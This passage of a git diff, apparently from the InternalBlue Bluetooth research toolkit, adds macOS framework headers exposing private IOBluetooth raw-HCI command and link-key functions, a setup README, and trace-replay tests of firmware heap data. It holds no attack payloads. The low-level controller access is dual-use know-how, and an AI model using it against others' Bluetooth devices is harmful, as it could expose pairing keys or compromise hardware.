- (int)BluetoothHCISendKeypressNotification:(const struct BluetoothDeviceAddress *)arg1 inNotificationType:(unsigned char)arg2;
- (int)BluetoothHCIWriteInquiryTransmitPowerLevel:(BOOL)arg1;
- (int)BluetoothHCIReadInquiryResponseTransmitPowerLevel:(char *)arg1;
- (int)BluetoothHCIReadLocalOOBData:(struct BluetoothHCISimplePairingOOBData *)arg1 outR:(struct BluetoothHCISimplePairingOOBData *)arg2;
- (int)BluetoothHCIWriteSimplePairingMode:(unsigned char)arg1;
- (int)BluetoothHCIReadSimplePairingMode:(char *)arg1;
- (int)BluetoothHCIRefreshEncryptionKey:(unsigned short)arg1 outRefreshEncryptionKeyResults:(struct BluetoothHCIEventEncryptionKeyRefreshCompleteResults *)arg2;
- (int)BluetoothHCIWriteExtendedInquiryResponse:(unsigned char)arg1 inExtendedInquiryResponse:(const struct BluetoothHCIExtendedInquiryResponse *)arg2;
- (int)BluetoothHCIReadExtendedInquiryResponse:(char *)arg1 outExtendedInquiryResponse:(struct BluetoothHCIExtendedInquiryResponse *)arg2;
- (int)BluetoothHCIWriteAFHChannelAssessmentMode:(unsigned char)arg1;
- (int)BluetoothHCIReadAFHChannelAssessmentMode:(char *)arg1;
- (int)BluetoothHCIWritePageScanType:(unsigned char)arg1;
- (int)BluetoothHCIReadPageScanType:(char *)arg1;
- (int)BluetoothHCIWriteInquiryMode:(unsigned char)arg1;
- (int)BluetoothHCIReadInquiryMode:(char *)arg1;
- (int)BluetoothHCIWriteInquiryScanType:(unsigned char)arg1;
- (int)BluetoothHCIReadInquiryScanType:(char *)arg1;
- (int)BluetoothHCISetAFHHostChannelClassification:(const struct BluetoothAFHHostChannelClassification *)arg1;
- (int)BluetoothHCIWriteCurrentIACLAP:(const struct BluetoothHCICurrentInquiryAccessCodes *)arg1;
- (int)BluetoothHCIReadCurrentIACLAP:(struct BluetoothHCICurrentInquiryAccessCodes *)arg1;
- (int)BluetoothHCIReadNumberOfSupportedIAC:(char *)arg1;
- (int)BluetoothHCIWriteLinkSupervisionTimeout:(unsigned short)arg1 inLinkSupervisionTimeout:(unsigned short)arg2;
- (int)BluetoothHCIReadLinkSupervisionTimeout:(unsigned short)arg1 outLinkSupervisionTimeout:(unsigned short *)arg2;
- (int)BluetoothHCIHostNumberOfCompletedPackets:(unsigned char)arg1 inHandle:(const unsigned short *)arg2 inHostNumOfCompletedPackets:(const unsigned short *)arg3;
- (int)BluetoothHCIHostBufferSize:(unsigned short)arg1 inHostSynchronousDataPacketLength:(unsigned char)arg2 inHostTotalNumACLDataPackets:(unsigned short)arg3 inHostTotalNumSynchronousDataPackets:(unsigned short)arg4;
- (int)BluetoothHCISetControllerToHostFlowControl:(unsigned char)arg1;
- (int)BluetoothHCIWriteSynchronousFlowControlEnable:(unsigned char)arg1;
- (int)BluetoothHCIReadSynchronousFlowControlEnable:(char *)arg1;
- (int)BluetoothHCIReadTransmitPowerLevel:(unsigned short)arg1 inType:(unsigned char)arg2 outTransmitPowerLevel:(char *)arg3;
- (int)BluetoothHCIWriteHoldModeActivity:(unsigned char)arg1;
- (int)BluetoothHCIReadHoldModeActivity:(char *)arg1;
- (int)BluetoothHCIWriteNumBroadcastRetransmissions:(unsigned char)arg1;
- (int)BluetoothHCIReadNumBroadcastRetransmissions:(char *)arg1;
- (int)BluetoothHCIWriteAutomaticFlushTimeout:(unsigned short)arg1 inFlushTimeout:(unsigned short)arg2;
- (int)BluetoothHCIReadAutomaticFlushTimeout:(unsigned short)arg1 outFlushTimeout:(unsigned short *)arg2;
- (int)BluetoothHCIWriteVoiceSetting:(unsigned short)arg1;
- (int)BluetoothHCIReadVoiceSetting:(unsigned short *)arg1;
- (int)BluetoothHCIWriteClassOfDevice:(unsigned int)arg1;
- (int)BluetoothHCIReadClassOfDevice:(unsigned int *)arg1;
- (int)BluetoothHCIWriteAuthenticationEnable:(unsigned char)arg1;
- (int)BluetoothHCIReadAuthenticationEnable:(char *)arg1;
- (int)BluetoothHCIWriteInquiryScanActivity:(unsigned short)arg1 inInquiryScanWindow:(unsigned short)arg2;
- (int)BluetoothHCIReadInquiryScanActivity:(unsigned short *)arg1 outInquiryScanWindow:(unsigned short *)arg2;
- (int)BluetoothHCIWritePageScanActivity:(unsigned short)arg1 inPageScanWindow:(unsigned short)arg2;
- (int)BluetoothHCIReadPageScanActivity:(unsigned short *)arg1 outPageScanWindow:(unsigned short *)arg2;
- (int)BluetoothHCIWriteScanEnable:(unsigned char)arg1;
- (int)BluetoothHCIReadScanEnable:(char *)arg1;
- (int)BluetoothHCIWritePageTimeout:(unsigned short)arg1;
- (int)BluetoothHCIReadPageTimeout:(unsigned short *)arg1;
- (int)BluetoothHCIWriteConnectionAcceptTimeout:(unsigned short)arg1;
- (int)BluetoothHCIReadConnectionAcceptTimeout:(unsigned short *)arg1;
- (int)BluetoothHCIReadLocalName:(unsigned char [256])arg1;
- (int)BluetoothHCIWriteLocalName:(unsigned char [256])arg1;
- (int)BluetoothHCIDeleteStoredLinkKey:(const struct BluetoothDeviceAddress *)arg1 inDeleteAllFlag:(unsigned char)arg2 outNumKeysDeleted:(unsigned short *)arg3;
- (int)BluetoothHCIWriteStoredLinkKey:(unsigned int)arg1 inDeviceAddress:(const struct BluetoothDeviceAddress *)arg2 inLinkKey:(const struct BluetoothKey *)arg3 outNumKeysWritten:(char *)arg4;
- (int)BluetoothHCIReadStoredLinkKey:(const struct BluetoothDeviceAddress *)arg1 inReadAllFlag:(unsigned char)arg2 outStoredLinkKeysInfo:(struct BluetoothHCIStoredLinkKeysInfo *)arg3;
- (int)BluetoothHCICreateNewUnitKey;
- (int)BluetoothHCIWritePINType:(unsigned char)arg1;
- (int)BluetoothHCIReadPINType:(char *)arg1;
- (int)BluetoothHCIFlush:(unsigned short)arg1;
- (int)BluetoothHCISetEventFilter:(unsigned char)arg1 inFilterConditionType:(unsigned char)arg2 inCondition:(struct BluetoothEventFilterCondition *)arg3;
- (int)BluetoothHCIReset;
- (int)BluetoothHCISetEventMask:(const struct BluetoothSetEventMask *)arg1;
- (int)BluetoothHCISniffSubrating:(unsigned short)arg1 inMaximumLatency:(unsigned short)arg2 inMinimumRemoteTimeout:(unsigned short)arg3 inMinimumLocalTimeout:(unsigned short)arg4 outConnectionHandle:(unsigned short *)arg5;
- (int)BluetoothHCIFlowSpecification:(struct BluetoothHCIEventFlowSpecificationData *)arg1 outFlowSpecificationCompleteResults:(struct BluetoothHCIEventFlowSpecificationData *)arg2;
- (int)BluetoothHCIWriteDefaultLinkPolicySettings:(unsigned short)arg1;
- (int)BluetoothHCIReadDefaultLinkPolicySettings:(unsigned short *)arg1;
- (int)BluetoothHCIWriteLinkPolicySettings:(unsigned short)arg1 inLinkPolicySettings:(unsigned short)arg2;
- (int)BluetoothHCIReadLinkPolicySettings:(unsigned short)arg1 outLinkPolicySettings:(unsigned short *)arg2;
- (int)BluetoothHCISwitchRole:(const struct BluetoothDeviceAddress *)arg1 inRole:(unsigned char)arg2 outRoleChangeResults:(struct BluetoothHCIEventRoleChangeResults *)arg3;
- (int)BluetoothHCIRoleDiscovery:(unsigned short)arg1 outCurrentRole:(char *)arg2;
- (int)BluetoothHCIQoSSetup:(unsigned short)arg1 inFlags:(unsigned char)arg2 inServiceType:(unsigned char)arg3 inTokenRate:(unsigned int)arg4 inPeakBandwidth:(unsigned int)arg5 inLatency:(unsigned int)arg6 inDelayVariation:(unsigned int)arg7 outQoSSetupCompleteResults:(struct BluetoothHCIEventQoSSetupCompleteResults *)arg8;
- (int)BluetoothHCIExitParkState:(unsigned short)arg1 outModeChangeResults:(struct BluetoothHCIEventModeChangeResults *)arg2;
- (int)BluetoothHCIParkState:(unsigned short)arg1 inBeaconMaxInterval:(unsigned short)arg2 inBeaconMinInterval:(unsigned short)arg3 outModeChangeResults:(struct BluetoothHCIEventModeChangeResults *)arg4;
- (int)BluetoothHCIExitSniffMode:(unsigned short)arg1 outModeChangeResults:(struct BluetoothHCIEventModeChangeResults *)arg2;
- (int)BluetoothHCISniffMode:(unsigned short)arg1 inSniffMaxInterval:(unsigned short)arg2 inSniffMinInterval:(unsigned short)arg3 inSniffAttempt:(unsigned short)arg4 inSniffTimeout:(unsigned short)arg5 outModeChangeResults:(struct BluetoothHCIEventModeChangeResults *)arg6;
- (int)BluetoothHCIHoldMode:(unsigned short)arg1 inHoldModeMaxInterval:(unsigned short)arg2 inHoldModeMinInterval:(unsigned short)arg3 outModeChangeResults:(struct BluetoothHCIEventModeChangeResults *)arg4;
- (int)BluetoothHCIIOCapabilityRequestNegativeReply:(const struct BluetoothDeviceAddress *)arg1 inReason:(unsigned char)arg2;
- (int)BluetoothHCIRemoteOOBDataRequestNegativeReply:(const struct BluetoothDeviceAddress *)arg1;
- (int)BluetoothHCIRemoteOOBDataRequestReply:(const struct BluetoothDeviceAddress *)arg1 inC:(const struct BluetoothHCISimplePairingOOBData *)arg2 inR:(const struct BluetoothHCISimplePairingOOBData *)arg3;
- (int)BluetoothHCIUserPasskeyRequestNegativeReply:(const struct BluetoothDeviceAddress *)arg1;
- (int)BluetoothHCIUserPasskeyRequestReply:(const struct BluetoothDeviceAddress *)arg1 inNumericValue:(unsigned int)arg2;
- (int)BluetoothHCIUserConfirmationRequestNegativeReply:(const struct BluetoothDeviceAddress *)arg1;
- (int)BluetoothHCIUserConfirmationRequestReply:(const struct BluetoothDeviceAddress *)arg1;
- (int)BluetoothHCIIOCapabilityRequestReply:(const struct BluetoothDeviceAddress *)arg1 inIOCapability:(unsigned char)arg2 inOOBDataPresent:(unsigned char)arg3 inAuthenticationRequirements:(unsigned char)arg4;
- (int)BluetoothHCIRejectSynchronousConnectionRequest:(const struct BluetoothDeviceAddress *)arg1 inReason:(unsigned char)arg2 outSynchronousConnectionCompleteResults:(struct BluetoothHCIEventSynchronousConnectionCompleteResults *)arg3;
- (int)BluetoothHCIAcceptSynchronousConnectionRequest:(const struct BluetoothDeviceAddress *)arg1 inTransmitBandwidth:(unsigned int)arg2 inReceiveBandwidth:(unsigned int)arg3 inMaxLatency:(unsigned short)arg4 inContentFormat:(unsigned short)arg5 inRetransmissionEffort:(unsigned char)arg6 inPacketType:(unsigned short)arg7 outSynchronousConnectionCompleteResults:(struct BluetoothHCIEventSynchronousConnectionCompleteResults *)arg8;
- (int)BluetoothHCISetupSynchronousConnection:(unsigned short)arg1 inTransmitBandwidth:(unsigned int)arg2 inReceiveBandwidth:(unsigned int)arg3 inMaxLatency:(unsigned short)arg4 inVoiceSetting:(unsigned short)arg5 inRetransmissionEffort:(unsigned char)arg6 inPacketType:(unsigned short)arg7 outSynchronousConnectionCompleteResults:(struct BluetoothHCIEventSynchronousConnectionCompleteResults *)arg8;
- (int)BluetoothHCIReadLMPHandle:(unsigned short)arg1 outReadLMPHandleResults:(struct BluetoothHCIReadLMPHandleResults *)arg2;
- (int)BluetoothHCIReadClockOffset:(unsigned short)arg1 outReadClockOffsetCompleteResults:(unsigned short *)arg2;
- (int)BluetoothHCIReadRemoteVersionInformation:(unsigned short)arg1 outReadRemoteVersionInformationCompleteResults:(struct BluetoothHCIEventReadRemoteVersionInfoResults *)arg2;
- (int)BluetoothHCIReadRemoteExtendedFeatures:(unsigned short)arg1 inPageNumber:(unsigned char)arg2 outReadRemoteExtendedFeaturesCompleteResults:(struct BluetoothHCIEventReadRemoteExtendedFeaturesResults *)arg3;
- (int)BluetoothHCIReadRemoteSupportedFeatures:(unsigned short)arg1 outReadRemoteSupportedFeaturesCompleteResults:(struct BluetoothHCIEventReadRemoteSupportedFeaturesResults *)arg2;
- (int)BluetoothHCIRemoteNameRequestCancel:(const struct BluetoothDeviceAddress *)arg1;
- (int)BluetoothHCIRemoteNameRequest:(const struct BluetoothDeviceAddress *)arg1 inPageScanRepetitionMode:(unsigned char)arg2 inReserved:(unsigned char)arg3 inClockOffset:(unsigned short)arg4 outRemoteNameRequestCompleteResults:(struct BluetoothHCIEventRemoteNameRequestResults *)arg5;
- (int)BluetoothHCIMasterLinkKey:(unsigned char)arg1 outMasterLinkKeyCompleteResults:(struct BluetoothHCIEventMasterLinkKeyCompleteResults *)arg2;
- (int)BluetoothHCIChangeConnectionLinkKey:(unsigned short)arg1 outChangeConnectionLinkKeyCompleteResults:(struct BluetoothHCIEventChangeConnectionLinkKeyCompleteResults *)arg2;
- (int)BluetoothHCISetConnectionEncryption:(unsigned short)arg1 inEncryptionEnable:(unsigned char)arg2 outEncryptionChangeResults:(struct BluetoothHCIEventEncryptionChangeResults *)arg3;
- (int)BluetoothHCIAuthenticationRequested:(unsigned short)arg1 outAuthenticationCompleteResults:(struct BluetoothHCIEventAuthenticationCompleteResults *)arg2;
- (int)BluetoothHCIChangeConnectionPacketType:(unsigned short)arg1 inPacketType:(unsigned short)arg2 outConnectionPacketTypeChangedResults:(struct BluetoothHCIEventConnectionPacketTypeResults *)arg3;
- (int)BluetoothHCIPINCodeRequestNegativeReply:(const struct BluetoothDeviceAddress *)arg1;
- (int)BluetoothHCIPINCodeRequestReply:(const struct BluetoothDeviceAddress *)arg1 inPINCodeLength:(unsigned long long)arg2 inPINCode:(const struct BluetoothPINCode *)arg3;
- (int)BluetoothHCILinkKeyRequestNegativeReply:(const struct BluetoothDeviceAddress *)arg1;
- (int)BluetoothHCILinkKeyRequestReply:(const struct BluetoothDeviceAddress *)arg1 inLinkKey:(const struct BluetoothKey *)arg2;
- (int)BluetoothHCIRejectConnectionRequest:(const struct BluetoothDeviceAddress *)arg1 inReason:(unsigned char)arg2 outConnectionCompleteResults:(struct BluetoothHCIEventConnectionCompleteResults *)arg3;
- (int)BluetoothHCIAcceptConnectionRequest:(const struct BluetoothDeviceAddress *)arg1 inRole:(unsigned char)arg2 outConnectionCompleteResults:(struct BluetoothHCIEventConnectionCompleteResults *)arg3;
- (int)BluetoothHCICreateConnectionCancel:(const struct BluetoothDeviceAddress *)arg1;
- (int)BluetoothHCIDisconnect:(unsigned short)arg1 inReason:(unsigned char)arg2 outDisconnectionCompleteResults:(struct BluetoothHCIEventDisconnectionCompleteResults *)arg3;
- (int)BluetoothHCICreateConnection:(const struct BluetoothDeviceAddress *)arg1 inPacketType:(unsigned short)arg2 inPageScanRepetitionMode:(unsigned char)arg3 inReserved:(unsigned char)arg4 inClockOffset:(unsigned short)arg5 inAllowRoleSwitch:(unsigned char)arg6 outConnectionCompleteResults:(struct BluetoothHCIEventConnectionCompleteResults *)arg7;
- (int)BluetoothHCIExitPeriodicInquiryMode;
- (int)BluetoothHCIPeriodicInquiryMode:(unsigned char)arg1 inMinPeriodLength:(unsigned char)arg2 inLAP:(unsigned int)arg3 inInquiryLength:(unsigned char)arg4 inNumResponses:(unsigned char)arg5 outInquiryResults:(struct BluetoothHCIInquiryResults *)arg6;
- (int)BluetoothHCIInquiryCancel;
- (int)BluetoothHCIInquiry:(unsigned int)arg1 inInquiryLength:(unsigned char)arg2 inNumResponses:(unsigned char)arg3 outInquiryResults:(struct BluetoothHCIInquiryResults *)arg4;
- (void)releaseRequest:(unsigned int)arg1;
- (unsigned int)requestWithTimeout:(int)arg1 isSynchronous:(BOOL)arg2 device:(id)arg3;
- (int)setClassOfDevice:(unsigned int)arg1 forTimeInterval:(double)arg2;
- (unsigned int)classOfDevice;
- (unsigned short)USBVendorID;
- (unsigned short)USBProductID;
- (int)configState;
- (unsigned int)featureFlags;
- (int)getAddress:(struct BluetoothDeviceAddress *)arg1;
- (id)nameAsString;
- (id)addressAsString;
- (int)setProperty:(id)arg1 forKey:(id)arg2;
- (int)enableRemoteWake:(BOOL)arg1;
- (int)softwareVersion:(struct NumVersion *)arg1 firmwareVersion:(struct BluetoothHCIVersionInfo *)arg2;
- (int)getControllerManufacturerName;
- (int)getDiagnosticInfo;
- (BOOL)isReady;
- (void)finalize;
- (void)dealloc;
- (id)init;
@end
#pragma mark - Private IOBluetooth Functions
struct IOBluetoothHCIDispatchParams {
uint64_t args[7];
uint64_t sizes[7];
uint64_t index;
};
struct BluetoothHCIUserClientNotificationDataInfo {
unsigned long long _field1;
unsigned long long _field2;
struct BluetoothHCIRequestCallbackInfo _field3;
unsigned int parameterSize;
unsigned int _field5;
unsigned short opcode;
unsigned char _field7;
unsigned char _field8;
unsigned char _field9;
unsigned char _field10;
unsigned char _field11;
unsigned char _field12;
};
struct IOBluetoothHCIEventNotificationMessage {
struct BluetoothHCIUserClientNotificationDataInfo dataInfo;
void *eventParameterBytes;
};
int BluetoothHCIRequestCreate(uint32_t *request, int timeout, void* arg3, size_t arg4);
int BluetoothHCIRequestDelete(uint32_t request);
int BluetoothHCISendRawCommand(uint32_t request,
void *commandData,
size_t commmandSize);
int BluetoothHCISendRawACLData(void *commandData,
size_t commandSize,
uint32_t handle,
uint32_t request);
int BluetoothHCIDispatchUserClientRoutine(struct IOBluetoothHCIDispatchParams *arguments,
unsigned char *returnValue,
size_t *returnValueSize);
#pragma mark - Helper Methods
/**
Data object for notification message.
*/
static inline NSData * IOBluetoothHCIEventParameterData(IOBluetoothHCIEventNotificationMessageRef message)
//__attribute__((swift_name("getter:IOBluetoothHCIEventNotificationMessageRef.eventParameterData(self:)")))
{
size_t size = message->dataInfo.parameterSize;
NSData *data = [NSData dataWithBytes:&message->eventParameterBytes length:size];
return data;
}
NS_ASSUME_NONNULL_END
macos-framework/IOBluetoothExtended/IOBluetoothExtended/Info.plist
+24
View File
@@ -0,0 +1,24 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleDevelopmentRegion</key>
<string>$(DEVELOPMENT_LANGUAGE)</string>
<key>CFBundleExecutable</key>
<string>$(EXECUTABLE_NAME)</string>
<key>CFBundleIdentifier</key>
<string>$(PRODUCT_BUNDLE_IDENTIFIER)</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundleName</key>
<string>$(PRODUCT_NAME)</string>
<key>CFBundlePackageType</key>
<string>FMWK</string>
<key>CFBundleShortVersionString</key>
<string>1.0</string>
<key>CFBundleVersion</key>
<string>$(CURRENT_PROJECT_VERSION)</string>
<key>NSHumanReadableCopyright</key>
<string>Copyright © 2019 Davide Toldo. All rights reserved.</string>
</dict>
</plist>
macos-framework/IOBluetoothExtended/IOBluetoothExtendedTests/IOBluetoothExtendedTests.m
+37
View File
@@ -0,0 +1,37 @@
//
// IOBluetoothExtendedTests.m
// IOBluetoothExtendedTests
//
// Created by Davide Toldo on 06.07.19.
// Copyright © 2019 Davide Toldo. All rights reserved.
//
#import <XCTest/XCTest.h>
@interface IOBluetoothExtendedTests : XCTestCase
@end
@implementation IOBluetoothExtendedTests
- (void)setUp {
// Put setup code here. This method is called before the invocation of each test method in the class.
}
- (void)tearDown {
// Put teardown code here. This method is called after the invocation of each test method in the class.
}
- (void)testExample {
// This is an example of a functional test case.
// Use XCTAssert and related functions to verify your tests produce the correct results.
}
- (void)testPerformanceExample {
// This is an example of a performance test case.
[self measureBlock:^{
// Put the code you want to measure the time of here.
}];
}
@end
macos-framework/IOBluetoothExtended/IOBluetoothExtendedTests/Info.plist
+22
View File
@@ -0,0 +1,22 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleDevelopmentRegion</key>
<string>$(DEVELOPMENT_LANGUAGE)</string>
<key>CFBundleExecutable</key>
<string>$(EXECUTABLE_NAME)</string>
<key>CFBundleIdentifier</key>
<string>$(PRODUCT_BUNDLE_IDENTIFIER)</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundleName</key>
<string>$(PRODUCT_NAME)</string>
<key>CFBundlePackageType</key>
<string>BNDL</string>
<key>CFBundleShortVersionString</key>
<string>1.0</string>
<key>CFBundleVersion</key>
<string>1</string>
</dict>
</plist>
macos-framework/README.md
+23
View File
@@ -0,0 +1,23 @@
macOS Setup
-----------
```
brew install unicorn
pip install pwntools
pip install pyobjc
open internalblue/macos-framework/IOBluetoothExtended/IOBluetoothExtended.xcodeproj/
```
⌘ + B
```
python internalblue/cli.py
```
If you want to use ARM assembly and disassembly, which is required for some patches and debugging:
* brew install https://github.com/Gallopsled/pwntools-binutils/raw/master/osx/binutils-arm.rb
* Xcode 10.2.1
requirements.txt
-1
View File
@@ -1 +0,0 @@
pwntools==3.12.2
setup.py
+5 -1
View File
@@ -11,8 +11,12 @@ setup(name='internalblue',
license='MIT',
packages=['internalblue', 'internalblue/fw'],
install_requires=[
'pwntools',
'pwntools>=4.2.0.dev0',
'pyelftools',
],
extras_require={
"macoscore": ["pyobjc"],
},
entry_points = {
'console_scripts': ['internalblue=internalblue.cli:internalblue_cli']
},
tests/all_traces_test.py
View File
tests/dummy_core_test.py
+17
View File
@@ -0,0 +1,17 @@
import unittest
from internalblue.testcore import testCore
class DummyCoreTest(unittest.TestCase):
def setUp(self):
t = testCore(log_level='debug', data_directory='/tmp')
dev = t.device_list()[0]
reference = dev[0]
reference.interface = dev[1]
self.assert_(reference.connect(), 'Connect failed')
self.reference = reference
def tearDown(self):
self.reference.shutdown()
tests/generic_test.sh
+12
View File
@@ -0,0 +1,12 @@
#!/bin/env sh
line=$(head -n 1 "$1")
if [[ $line == \#* ]] ;
then
python -m internalblue.cli --device hci0 --replay "$1" --commands "$(echo $line | tr -d "#"); quit" 2>&1 | grep AssertionError || exit 0 && exit 1
else
echo "Trace $1 has no command specified"
fi
tests/test_heap_new.py
+282
View File
@@ -0,0 +1,282 @@
from __future__ import print_function
from internalblue.cli import _parse_argv
from internalblue.hcicore import HCICore
import os
import nose
try:
from typing import List, Optional, Any, TYPE_CHECKING, Tuple
except ImportError:
pass
def test_info_heap_new():
dummy = [
{
"index": 0,
"capacity": 32,
"address": 2100380,
"next": 2100412,
"memory_size": 1152,
"buffer_list": 2190960,
"memory": 2190864,
"buffer_size": 32,
"buffer_headers": {
2191872: 2134443254,
2191620: 2037880954,
2191368: 375085499,
2191116: 3147300663,
2190864: 0,
2191764: 264196083,
2191512: 2509895076,
2191260: 2520551584,
2191008: 0,
2191908: 1846542368,
2191656: 1757769142,
2191404: 3932721686,
2191152: 2191184,
2190900: 28735,
2191800: 2840650003,
2191548: 1443923039,
2191296: 1489683938,
2191044: 4066066958,
2191944: 1913651233,
2191692: 152195353,
2191440: 2191472,
2191188: 1557416373,
2190936: 302056974,
2191836: 649087106,
2191584: 3228135896,
2191332: 3061215438,
2191080: 720823376,
2191980: 2196903397,
2191728: 2191760,
2191476: 2016717863,
2191224: 733933656,
2190972: 101581052
},
"list_length": 28
},
{
"index": 1,
"capacity": 50,
"address": 2100412,
"next": 2100444,
"memory_size": 5000,
"buffer_list": 2191888,
"memory": 2191888,
"buffer_size": 96,
"buffer_headers": {
2194688: 2418054699,
2196288: 1950181917,
2192388: 998902997,
2193288: 1237870693,
2196588: 3682344019,
2194188: 3476501705,
2191888: 2191984,
2195288: 1169168150,
2192788: 733035576,
2193688: 212170382,
2195588: 4256985711,
2194588: 2553343043,
2196688: 2197224,
2192288: 1364917638,
2195888: 19938058,
2193188: 1183181508,
2194088: 2389621397,
2196188: 1101316817,
2194988: 4119138959,
2192688: 3404258821,
2196488: 2957618219,
2193588: 1015303433,
2194488: 1542989588,
2195188: 334177442,
2192188: 3048389179,
2193088: 4249806944,
2195488: 1476670297,
2193988: 4205996809,
2196788: 0,
2194888: 1063521161,
2195788: 1587397832,
2192588: 3951930416,
2193488: 3182543110,
2196088: 1404536822,
2194388: 3962928810,
2192088: 1508747568,
2196388: 2481150443,
2192988: 3794218756,
2193888: 2230011074,
2195088: 2388733849,
2194788: 319481313,
2192488: 1066099460,
2195388: 2397324227,
2193388: 3268540448,
2194288: 2194384,
2195688: 443293108,
2191988: 3365837461,
2192888: 2725717105,
2195988: 954670552,
2193788: 2274473962
},
"list_length": 50
},
{
"index": 2,
"capacity": 12,
"address": 2100444,
"next": 2169260,
"memory_size": 3264,
"buffer_list": 2196688,
"memory": 2196688,
"buffer_size": 268,
"buffer_headers": {
2196960: 1868719728,
2198048: 2301952667,
2197504: 2764580300,
2198592: 4031749240,
2199408: 3141828370,
2199680: 2673196138,
2197776: 655413012,
2196688: 2197224,
2198864: 483218198,
2199136: 2070409995,
2197232: 4269595008,
2198320: 2960663615
},
"list_length": 11
},
{
"index": 3,
"capacity": 4,
"address": 2169260,
"next": 2169292,
"memory_size": 4288,
"buffer_list": 2199904,
"memory": 2199904,
"buffer_size": 1068,
"buffer_headers": {
2199904: 2200972,
2200976: 3538041113,
2202048: 1981831315,
2203120: 2664647264
},
"list_length": 4
},
{
"index": 4,
"capacity": 16,
"address": 2169292,
"next": 2169324,
"memory_size": 17536,
"buffer_list": 2204176,
"memory": 2204176,
"buffer_size": 1092,
"buffer_headers": {
2206368: 3081486871,
2208560: 2201211482,
2218424: 1142812043,
2210752: 1735894938,
2219520: 1997110991,
2207464: 3467810309,
2220616: 3465059190,
2217328: 3406578824,
2215136: 2543784863,
2204176: 2205268,
2209656: 3726451979,
2214040: 3051833507,
2211848: 3382482014,
2205272: 2465189202,
2212944: 2900433384,
2216232: 619500542
},
"list_length": 16
},
{
"index": 5,
"capacity": 15,
"address": 2169324,
"next": 2169356,
"memory_size": 4020,
"buffer_list": 2221648,
"memory": 2221648,
"buffer_size": 264,
"buffer_headers": {
2222720: 4187811300,
2223792: 71320053,
2223524: 2131726092,
2222184: 983003111,
2224060: 1514897371,
2222988: 2920869383,
2225132: 670722248,
2225400: 4011899155,
2221648: 2221912,
2224328: 1327684221,
2222452: 1691084254,
2223256: 2278527172,
2224596: 3213868993,
2221916: 2666878639,
2224864: 4293236507
},
"list_length": 15
},
{
"index": 6,
"capacity": 15,
"address": 2169356,
"next": 0,
"memory_size": 4020,
"buffer_list": 2225608,
"memory": 2225608,
"buffer_size": 264,
"buffer_headers": {
2226144: 2468503925,
2228288: 3769100033,
2226948: 3003019165,
2225608: 2225872,
2228556: 1848533574,
2226412: 19831529,
2229360: 3069868169,
2227216: 2022414238,
2227752: 2727841579,
2228824: 1909490602,
2225876: 2300688060,
2226680: 210906155,
2228020: 3166977216,
2227484: 2262736138,
2229092: 1991768492
},
"list_length": 15
}
]
trace = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'traces/hcicore/dictionary_tests/info_heap_new.trace')
args = _parse_argv('')
args.device = 'adb_replay'
args.replay = trace
data_directory = os.path.expanduser('~') + '/.internalblue'
if not os.path.exists(data_directory):
os.mkdir(data_directory)
from internalblue.socket_hooks import hook, ReplaySocket
hook(HCICore, ReplaySocket, filename=args.replay)
connection_methods = [HCICore(log_level='info', data_directory=data_directory, replay=True)]
devices = [] # type: List[DeviceTuple]
devices = connection_methods[0].device_list()
device = devices[0]
reference = device[0]
reference.interface = device[1]
reference.connect()
information = reference.readHeapInformation()
print(information)
nose.tools.assert_equal(information, dummy)
reference.shutdown()
tests/test_heap_old.py
+234
View File
@@ -0,0 +1,234 @@
from __future__ import print_function
from internalblue.cli import _parse_argv
from internalblue.adbcore import ADBCore
import os
import nose
try:
from typing import List, Optional, Any, TYPE_CHECKING, Tuple
except ImportError:
pass
def test_info_heap_old():
dummy = [
{
'index':0,
'buffer_headers': {
2194080: 0,
2193828: 2121160,
2193864: 2194008,
2193900: 2194044,
2193936: 2193864,
2193972: 2121160,
2194008: 2193900,
2194044: 2194080
},
'capacity': 8,
'address': 2121160,
'next': 2121208,
'memory_size': 288,
'waitlist_length': 0,
'buffer_list': 2193828,
'memory': 2193828,
'buffer_size': 32,
'prev': 2157672,
'list_length': 7,
'thread_waitlist': 0
},
{
'index': 1,
'buffer_headers': {
2194592: 0,
2194116: 2194184,
2194184: 2194252,
2194252: 2194320,
2194320: 2194388,
2194388: 2194456,
2194456: 2194524,
2194524: 2194592
},
'capacity': 8,
'address': 2121208,
'next': 2121256,
'memory_size': 544,
'waitlist_length': 0,
'buffer_list': 2194184,
'memory': 2194116,
'buffer_size': 64,
'prev': 2121160,
'list_length': 7,
'thread_waitlist': 0
},
{
'index': 2,
'buffer_headers': {
2196000: 2196268,
2197072: 0,
2194660: 2194928,
2195464: 2195732,
2196268: 2196536,
2194928: 2195196,
2195732: 2196000,
2196536: 2196804,
2196804: 2197072,
2195196: 2195464
},
'capacity': 10,
'address': 2121256,
'next': 2121352,
'memory_size': 2680,
'waitlist_length': 0,
'buffer_list': 2194660,
'memory': 2194660,
'buffer_size': 264,
'prev': 2121208,
'list_length': 10,
'thread_waitlist': 0
},
{
'index': 3,
'buffer_headers': {
2214480: 2215548,
2215548: 2216616,
2216616: 0,
2213412: 2214480
},
'capacity': 4,
'address': 2121352,
'next': 2121304,
'memory_size': 4272,
'waitlist_length': 0,
'buffer_list': 2213412,
'memory': 2213412,
'buffer_size': 1064,
'prev': 2121256,
'list_length': 4,
'thread_waitlist': 0
},
{
'index': 4,
'buffer_headers': {
2234124: 0,
2231932: 2233028,
2224260: 2225356,
2219876: 2220972,
2226452: 2227548,
2223164: 2224260,
2228644: 2229740,
2220972: 2222068,
2225356: 2226452,
2230836: 2231932,
2233028: 2234124,
2222068: 2223164,
2227548: 2228644,
2217684: 2218780,
2218780: 2219876,
2229740: 2230836
},
'capacity': 16,
'address': 2121304,
'next': 2157624,
'memory_size': 17536,
'waitlist_length': 0,
'buffer_list': 2217684,
'memory': 2217684,
'buffer_size': 1092,
'prev': 2121352,
'list_length': 16,
'thread_waitlist': 0
},
{
'index': 5,
'buffer_headers': {
2235264: 2235308,
2235616: 2235660,
2235396: 2235440,
2235528: 2235572,
2235660: 2235704,
2235308: 2235352,
